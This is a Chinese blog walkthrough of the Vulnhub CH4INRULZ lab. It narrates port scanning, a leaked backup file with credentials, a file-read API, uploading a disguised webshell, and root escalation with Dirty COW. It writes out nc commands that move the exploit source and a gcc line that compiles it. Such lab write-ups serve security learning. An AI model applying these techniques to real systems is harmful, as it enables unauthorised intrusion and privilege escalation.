Vulnhub靶场渗透-CH4INRULZ_v1.0.1

前言

靶机ip(192.168.110.135)
攻击机ip(192.168.110.127)
网络NAT模式

直接开始

信息收集

吃了上次的亏,这次就比较详细的扫了一下端口
发现 ftp服务的2.3.4版本在 msf中可以直接利用,但这是2.3.5版本,抱着试一试去搞了一下,哈哈哈没有任何作用
在这里插入图片描述
扫描 80 端口
在这里插入图片描述
扫描 8011 端口
在这里插入图片描述
看见 8011 的结果里有 index.html,直觉告诉我可能有备份文件
在这里插入图片描述
在这里插入图片描述
对这个解密,拿到一对账号密码,先不管他
在这里插入图片描述
主页打开是一个博客
在这里插入图片描述
扫到的那个 /api/ 打开,只有这个文件读取是可以使用的,别的都还没有完成吧
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
当访问 /development/ 时,是需要密码的,用开始发现的密码可以登录
很明显这是一个还未完成的文件上传的功能

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
试了几次,可以上传后缀 .gif 的文件,居然这样那就直接弹 shell吧
在这里插入图片描述
在这里插入图片描述
但是这里并不知道到上传的文件路径,正好可以利用开始的 api 来读文件,解码拿到路径
在这里插入图片描述
在这里插入图片描述
访问我们上传的马子来执行,拿到 shell
在这里插入图片描述
拿到第一个 flag
在这里插入图片描述
内核大于 2.6.22 版本的都可以尝试用脏牛提权
在这里插入图片描述
这里直接传 exp 给靶机了,然后编译运行,直接就是 root
当然注意这里还需要有对文件的写入权限,/var/a/ 目录下可以
在这里插入图片描述
利用 nc 传文件
接收方 nc -l 1221 > dirtycow.c
传输方 nc 192.168.127.135 1221 < dirtycow.c
在这里插入图片描述
gcc -pthread dirtycow.c -o dcow -lcrypt
在这里插入图片描述
可以看见他为我们创建了一个新的 user,而且还是 root组的
所以我们其实已经可以用这个用户登录了,而且是 root权限的用户

在这里插入图片描述
拿到第二个 flag
在这里插入图片描述

总结

这个靶场就体现了信息收集的重要性,这要是没有发现那个备份文件还不知道要怎么搞
然后就是熟练利用脏牛来提权,省事

  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 5
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

paidx0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值